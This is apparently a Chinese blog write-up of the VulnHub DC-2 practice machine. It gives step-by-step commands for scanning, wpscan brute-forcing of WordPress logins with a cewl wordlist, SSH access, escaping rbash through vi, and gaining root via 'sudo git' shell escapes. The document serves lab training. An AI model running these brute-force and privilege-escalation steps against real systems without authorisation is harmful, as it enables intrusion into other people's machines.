码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 【Try to Hack】vulnhub DC2


    📒博客主页:开心星人的博客主页
    🔥系列专栏:Try to Hack
    🎉欢迎关注🔎点赞👍收藏⭐️留言📝
    📆首发时间:🌴2022年6月29日🌴
    🍭作者水平很有限,如果发现错误,还望告知,感谢!

    靶机知识点:
    1、hosts文件
    2、dirb扫目录
    3、wpscan枚举用户名
    4、cewl爬取密码
    5、ssh服务登录
    6、rbash逃逸
    7、git提权

    在这里插入图片描述
    首先是桥接模式
    要注意的是这个靶场不是静态IP,那个192.168.0.145只是个示例,告诉我们如何设置hosts文件的

    照常下载靶机,它默认就是桥接模式了
    在这里插入图片描述
    不需要改动

    kali攻击机也设置桥接模式(我是这样弄的)

    netdiscover进行主机发现
    因为靶机不是桥接模式,和我们的kali可能不在同一个网段
    arp-scan -l也只能扫描和kali在同一网段的主机
    在这里插入图片描述
    这个是我们的靶机,因为VMare,Inc

    端口扫描
    namp -sV -p- 192.168.0.131
    在这里插入图片描述

    80端口开放,访问192.168.0.131
    在这里插入图片描述

    这样的结果

    根据刚开始题目的描述,去设置一下hosts
    vim /etc/hosts
    在这里插入图片描述

    在这里插入图片描述
    访问成功
    在这里插入图片描述
    提示我们使用cewl
    whatweb 192.168.0.131
    在这里插入图片描述
    是wordpress

    dirb http://192.168.0.131
    目录扫描
    在这里插入图片描述
    http://192.168.0.131/wp-admin/
    可能是后台,访问一下
    在这里插入图片描述
    确实是,需要账号和密码
    现在我们使用cewl吧
    爬取网站内容,生成字典

    cewl dc-2 > dc-2.txt
    在这里插入图片描述
    这是密码字典

    我们使用wpscan获得用户名
    wpscan --url http://dc-2 -e u

    在这里插入图片描述
    保存为user.txt
    在这里插入图片描述

    wpscan --url http://dc-2 --usernames user.txt --passwords dc-2.txt
    用bp也可以
    在这里插入图片描述
    登录jerry,简单找一下
    在这里插入图片描述
    在这里插入图片描述
    提示我们不能利用wordpress的漏洞

    在这里插入图片描述
    以为在这可以写shell的

    用两个账号密码登录ssh

    ssh -p 7744 tom@192.168.0.131
    ssh -p 7744 jerry@192.168.0.131
    
    • 1
    • 2

    在这里插入图片描述
    登录进去了,也发现flag3了
    但是读文件的命令被ban了

    看下可以使用哪些命令

    echo $PATH
    echo /home/tom/usr/bin/*
    
    • 1
    • 2

    在这里插入图片描述

    vi flag3.txt
    在这里插入图片描述
    看到了flag
    看wp明白,让我们用tom用户切换到jerry
    需要使用su

    在这里插入图片描述
    rbash逃逸
    rbash与一般shell的区别在于会限制一些行为,让一些命令无法执行。
    【渗透测试】— rbash逃逸方法简述

    在vi的:中可以将/bin/bash复制给shell
    vi
    输入:
    :set shell=/bin/sh
    再输入:
    :shell
    得到shell了

    切换完成之后还要添加环境变量。给$PATH变量增加两个路径,用来查找命令
    export PATH=$PATH:/bin/
    export PATH=$PATH:/usr/bin/
    
    • 1
    • 2
    • 3

    在这里插入图片描述
    成功了
    找一下flag
    在这里插入图片描述
    提示git
    git提权

    方法一
    sudo git help config
    !/bin/bash 或 !‘sh’
    
    方法二
    sudo git -p help
    !/bin/bash
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7

    在这里插入图片描述

  • 相关阅读:
    SystemVerilog学习(1)——验证导论
    Python——飞机大战(day10)
    2022 年 9 月青少年软编等考 C 语言一级真题解析
    计算机毕业设计 基于协调过滤算法的绿色食品推荐系统的设计与实现 Java实战项目 附源码+文档+视频讲解
    06-添加用户关注、我的关注列表
    svn入门到精通
    解决Vue的router-link路由跳转但页面没有刷新问题
    在 Solidity 中 ++i 为什么比 i++ 更省 Gas?
    多线程的创建、线程的状态和调度and同步、join和yield以及单例设计模式的种类
    fps透视基础-3分钟快速定位矩阵基址-附3D坐标转屏幕坐标算法
  • 原文地址:https://blog.csdn.net/qq_55675216/article/details/125518221
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号